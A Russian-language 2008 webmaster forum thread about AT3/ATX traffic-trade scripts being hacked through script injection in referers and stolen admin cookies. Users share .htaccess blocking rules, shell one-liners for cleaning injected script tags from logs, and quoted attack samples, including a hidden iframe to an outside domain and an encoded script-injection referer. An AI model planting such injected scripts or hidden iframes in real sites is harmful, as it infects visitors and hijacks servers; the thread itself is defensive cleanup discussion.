Master-X
Регистрация
|
Вход
Форум
|
Новости
|
Статьи
Главная
»
Форум
»
CJs
»
Тема:
Попытки залогинитьcя в АТЛ под user/pass
Новая тема
Ответить
цитата
17/03/08 в 00:55
Don Juan
тоже интересует вопрос
в плане уязвимости атл3 и атх отличия есть?
цитата
17/03/08 в 02:56
Kitaa
нету разницы.
цитата
18/03/08 в 09:31
brandox
Код:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?<\?(.*)?$ [NC,OR]
RewriteCond %{HTTP_REFERER} ^(.*)?\?>(.*)?$ [NC]
RewriteRule .*
http://google.com/
[L]
А можно расшифровать этот htaccess ?
для чего конкретно нужна последняя строчка ? Если я правильно понял - то нужно прописать yahoo и другие поисковики ?
цитата
18/03/08 в 09:51
dos622
если в рефе пришедшего посетителя содержеться: document.write\(unescape то такой юзер идет примяком на гуглю.
хацкеры подставляют в рефе данную строку чтоб трояна запихать.
цитата
18/03/08 в 10:29
brandox
приятно =) a пихать это в корневую папку или в cgi-bin/at3 ?
цитата
18/03/08 в 10:39
wMaster
в корень
цитата
18/03/08 в 11:16
shahfil
Soft-Com писал:
неплохо работает такой вариант защиты:
RewriteEngine on
RewriteCond %{HTTP_REFERER} ^(.*)?document.write\(unescape(.*)?$ [NC]
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?
цитата
18/03/08 в 13:14
Darkest
Ебать. Тоже понасовали.
Soft-Com:
поискал этой строкой (for file in locate x2.cgi do path и тп) - нашел как у всех в at3/l/in/ и в at3/l/sys/. Не подскажешь что в твою эту строку дописать, чтоб он все что нашел - покилял?
цитата
18/03/08 в 14:10
brandox
запустил софткомовскую комманду
насовали по самые помидоры в l/sys и l/in =(
а вот в самих html страницах на сайтах ничего нет (может пока)
как избавиться от заразы ? защиту я уже поставил через htaccessы
и теперь как я понимаю нужно менять пароли везде ? ну там мускл базы от st, от самого st, atx/ at3 и тд ?
цитата
18/03/08 в 15:05
saaas
shahfil писал:
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?
а с тех самых пор когда этот модреврайт начали пихать вот таким вот способом
Soft-Com писал:
.....
в админке в notrade траффике если есть заходы типа
http://alfaporn.com/?"%26gt;%26lt;script%26gt;document.write(unesca 6d%65%6...
.......
цитата
18/03/08 в 15:08
Soft-Com
shahfil писал:
и че, правда работает? с каких это пор параметры модреврайтом через HTTP_REFERER фильтруются?
мистика, но факт - работает.
И судя по в сему именно с тех пор, как модреврайт стал парсить заголовки запросов, а именно с самого начала существования этого модуля.
учи матчасть
http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
цитата
18/03/08 в 15:55
Soft-Com
лучше всего чистить так:
Код:
cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done
таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.
подобной же командой можно почистить и контент домена.
P.S.
через АТ3/АТХ можно поломать любую связку скриптов - как я уже писал раньше, можно порутать машину через это решето ...
цитата
18/03/08 в 20:23
Darkest
Мде. Печально все это.
2Админы СмартСЖ - может вы таки правда подумаете на тему скрипта за % траффа? Можете сделать какой-нить опрос типа кто будет этим пользоваться (с указанием имеющегося траффа), прикините ~ кол-во К в сутки котое вы сможете получать...
цитата
18/03/08 в 23:34
kazantipman
разъясните плиз
если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже?
цитата
18/03/08 в 23:47
Soft-Com
есть вероятность того, что выставив самому себе украденую (правильную) куку, можно непосредственным обращением к скриптам АТ3/АТХ менять параметры и т.д. и т.п. - никто веть не знает интерфейса всех скриптов ...
цитата
19/03/08 в 01:02
awm_mark
kazantipman писал:
разъясните плиз
если x2 login и admin.cgi закрыты хтакцессо
есть ли какая то опасность? т.е. даже если кто-то получает пасс от админки (через нотрэйд) как он попадет в админку если он ее не видит даже?
есть, учи матчасть (линухи, подмена IP)
цитата
19/03/08 в 01:44
CraZ
биля пиздец. даже в мой дохлый сидж запихнули и вообще наверно дедик придется проверять, вот же мазготни из-за ебучего ат3.......
цитата
19/03/08 в 03:15
amhost.net
Soft-Com писал:
лучше всего чистить так:
Код:
cd /tmp;
for file in `locate x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document.write(unesca" $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document.write.*unesca.*<\/script>//g'; done
таким образом почистятся логи и статсы АТ3/АТХ от js-инклюда.
предлагаю несколько расширить круг поиска, ибо попался инклуд через document.scripts
плюс не всегда стОит полагаться на locate, имеет смысл вместо него использовать find
Код:
for file in `find /home/ -name x2.cgi`; do path=`echo $file | awk -F"/x/x2.cgi" '{print $1}'`; grep -r "document." $path/l/* | awk -F":" '{print $1}' | xargs sed -i 's/<script.*document\..*<\/script>//g'; done
/home/ замените на свой каталог с доменами, если отличается
цитата
19/03/08 в 06:44
Soft-Com
да важное замечание - но для меня такое не подойдёт, у некоторых моих кастомеров кука выставляется подобным образом для трейда (если парсить контент имеется в виду)...
так что во тут как раз АВМ-мам уже стоит самим решать ... нанимать им администратора или нет
.
Последний раз редактировалось: Soft-Com (
19/03/08 в 07:20
), всего редактировалось 1 раз
цитата
19/03/08 в 07:15
Screwdriver
Хорошо что так и не купил ATX, снес к чертям атл со всех сайтов, прочитав этот топик.
цитата
19/03/08 в 09:28
coder-code
beto писал:
<iframe src="http://ebony-hardcore.net/streamrotator/z/static.php" width=2 height=2 style="display:none"></iframe>
это мой домен. к чему бы это?
цитата
19/03/08 в 09:28
coder-code
так все таки? чего делать то у когло alfaporn в реферах??
цитата
19/03/08 в 09:30
sexogen
slonic писал:
это мой домен. к чему бы это?
Оффтопик:
тебя вычеслии, ты тот самы хакер
цитата
19/03/08 в 09:43
Soft-Com
slonic писал:
так все таки? чего делать то у когло alfaporn в реферах??
заблокировать всё левое в хтаксесе а потом почистить логи и статсы.
цитата
19/03/08 в 09:51
coder-code
Soft-Com писал:
заблокировать всё левое в хтаксесе а потом почистить логи и статсы.
а можно каким нить доступным языком где нить почитатать как и что делать пошагово?
сенкс тебе, добрый человек
Стр.
« первая
<
2
,
3
,
4
,
5
,
6
>
последняя »
Новая тема
Ответить
Эта страница в полной версии